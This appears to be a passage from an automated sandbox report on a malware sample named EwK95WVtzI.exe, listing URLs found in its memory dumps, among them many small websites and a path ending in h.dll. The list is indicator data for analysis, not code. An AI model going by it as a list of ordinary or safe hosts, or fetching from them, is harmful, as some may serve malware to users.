http://www.valselit.com/wp-json/
                Source: EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515756554.0000000004DD0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1501880576.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1516104839.0000000003850000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1496465166.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1623241554.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1594794829.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1633194064.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1504588099.0000000004860000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1853565854.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1784646410.0000000004190000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1525347007.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1871154486.0000000003A50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1659128921.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1610312709.0000000003F90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/xmlrpc.php?rsd
                Source: EwK95WVtzI.exe, 00000000.00000003.1844171845.000000000167F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.vazir.se/
                Source: EwK95WVtzI.exe, 00000000.00000003.1844171845.000000000167F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.vazir.se/y
                Source: EwK95WVtzI.exe, 00000000.00000003.1844171845.000000000167F000.00000004.00000020.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2744288397.0000000001683000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.vexcom.com/
                Source: EwK95WVtzI.exe, 00000000.00000002.2744288397.0000000001683000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.vexcom.com/_
                Source: EwK95WVtzI.exe, 00000000.00000003.1844171845.000000000167F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.vexcom.com/u
                Source: EwK95WVtzI.exe, 00000000.00000003.1844171845.0000000001625000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.vitaindu.com/
                Source: EwK95WVtzI.exe, 00000000.00000003.1844171845.0000000001625000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.vitaindu.com/#
                Source: EwK95WVtzI.exe, 00000000.00000002.2744288397.000000000159E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.vitaindu.com/D3
                Source: EwK95WVtzI.exe, 00000000.00000003.2065701506.00000000077A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.w3.o
                Source: EwK95WVtzI.exe, 00000000.00000002.2744288397.0000000001683000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.waldi.pl/
                Source: EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1474529318.0000000007880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515756554.0000000004DD0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1501880576.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1516104839.0000000003850000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1496465166.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1623241554.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1480659952.0000000003FB0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1594794829.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1633194064.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1504588099.0000000004860000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1853565854.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1784646410.0000000004190000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.webeasy.com.hk
                Source: EwK95WVtzI.exe, 00000000.00000003.1844171845.0000000001625000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.wifi4all.nl/
                Source: EwK95WVtzI.exe, 00000000.00000002.2744288397.000000000159E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.wifi4all.nl/Z
                Source: EwK95WVtzI.exe, 00000000.00000002.2744288397.000000000159E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.wifi4all.nl/e
                Source: EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2023659658.0000000008480000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515756554.0000000004DD0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2280543004.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2035794915.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2025405422.0000000005690000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1516104839.0000000003850000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2024800885.0000000004D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1623241554.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2031272771.0000000005580000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2127544793.0000000003E40000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1594794829.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1633194064.0000000003F90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.winhui.cn/template/default/img/fixedimg1.png
                Source: EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2023659658.0000000008480000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515756554.0000000004DD0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2280543004.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2035794915.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2025405422.0000000005690000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1516104839.0000000003850000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2024800885.0000000004D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1623241554.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2031272771.0000000005580000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2127544793.0000000003E40000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1594794829.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1633194064.0000000003F90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.winhui.cn/template/default/img/fixedimg3.png
                Source: EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2023659658.0000000008480000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515756554.0000000004DD0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2280543004.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2035794915.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2025405422.0000000005690000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1516104839.0000000003850000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2024800885.0000000004D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1623241554.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2031272771.0000000005580000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2127544793.0000000003E40000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1594794829.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1633194064.0000000003F90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.winhui.cn/template/default/img/fixedimg4.png
                Source: EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2023659658.0000000008480000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515756554.0000000004DD0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2280543004.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2035794915.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2025405422.0000000005690000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1516104839.0000000003850000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2024800885.0000000004D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1623241554.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2031272771.0000000005580000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2127544793.0000000003E40000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1594794829.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1633194064.0000000003F90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.winhui.cn/template/default/img/fixedimg6.png
                Source: EwK95WVtzI.exe, 00000000.00000002.2744288397.000000000159E000.00000004.00000020.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1844171845.0000000001625000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.wkhk.net/
                Source: EwK95WVtzI.exe, 00000000.00000002.2744288397.000000000159E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.wkhk.net/H
                Source: EwK95WVtzI.exe, 00000000.00000002.2780153090.0000000005F0D000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.wnsavoy.com
                Source: EwK95WVtzI.exe, 00000000.00000002.2744288397.000000000162E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.wnsavoy.com/
                Source: EwK95WVtzI.exe, 00000000.00000002.2780153090.0000000005F0D000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.wnsavoy.com4
                Source: EwK95WVtzI.exe, 00000000.00000003.1738876014.0000000004A90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.wyjzradio.com
                Source: EwK95WVtzI.exe, 00000000.00000002.2744288397.000000000162E000.00000004.00000020.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1844171845.000000000166F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.x0c.com/
                Source: EwK95WVtzI.exe, 00000000.00000003.1844171845.000000000166F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.x0c.com//V
                Source: EwK95WVtzI.exe, 00000000.00000002.2744288397.0000000001683000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.xaicom.es/
                Source: EwK95WVtzI.exe, 00000000.00000002.2744288397.0000000001683000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.xaicom.es/v
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1452531175.0000000007A80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1980163682.0000000007980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515756554.0000000004DD0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.xjgc.com
                Source: EwK95WVtzI.exe, 00000000.00000003.1844171845.000000000167F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.yocinc.org/
                Source: EwK95WVtzI.exe, 00000000.00000002.2744288397.000000000162E000.00000004.00000020.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2744288397.000000000159E000.00000004.00000020.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1844171845.0000000001625000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.yoruksut.com/
                Source: EwK95WVtzI.exe, 00000000.00000002.2744288397.000000000162E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.yoruksut.com/a
                Source: EwK95WVtzI.exe, 00000000.00000002.2744288397.000000000159E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.yoruksut.com/h.dll
                Source: EwK95WVtzI.exe, 00000000.00000002.2744288397.000000000159E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.yumgiskor.kz/
                Source: EwK95WVtzI.exe, 00000000.00000002.2744288397.000000000159E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.yumgiskor.kz/:
                Source: EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1549093222.0000000007880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2280543004.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2035794915.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2025405422.0000000005690000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2024800885.0000000004D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2023550353.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1623241554.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2031272771.0000000005580000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2127544793.0000000003E40000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1594794829.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1633194064.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2377412406.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2258575246.0000000003980000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://ajax.googleapis.com/ajax/libs/prototype/1.7.1.0/prototype.js?ver=1.7.1
                Source: EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1549093222.0000000007880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2280543004.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2035794915.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2025405422.0000000005690000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2024800885.0000000004D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2023550353.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1623241554.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2031272771.0000000005580000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2127544793.0000000003E40000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1594794829.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1633194064.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2377412406.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2258575246.0000000003980000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://ajax.googleapis.com/ajax/libs/scriptaculous/1.9.0/effects.js?ver=1.9.0
                Source: EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1549093222.0000000007880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2280543004.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2035794915.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2025405422.0000000005690000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2024800885.0000000004D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2023550353.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1623241554.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2031272771.0000000005580000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2127544793.0000000003E40000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1594794829.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1633194064.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2377412406.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2258575246.0000000003980000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://ajax.googleapis.com/ajax/libs/scriptaculous/1.9.0/scriptaculous.js?ver=1.9.0
                Source: EwK95WVtzI.exe, 00000000.00000003.1998747633.0000000004980000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://api.w.org/
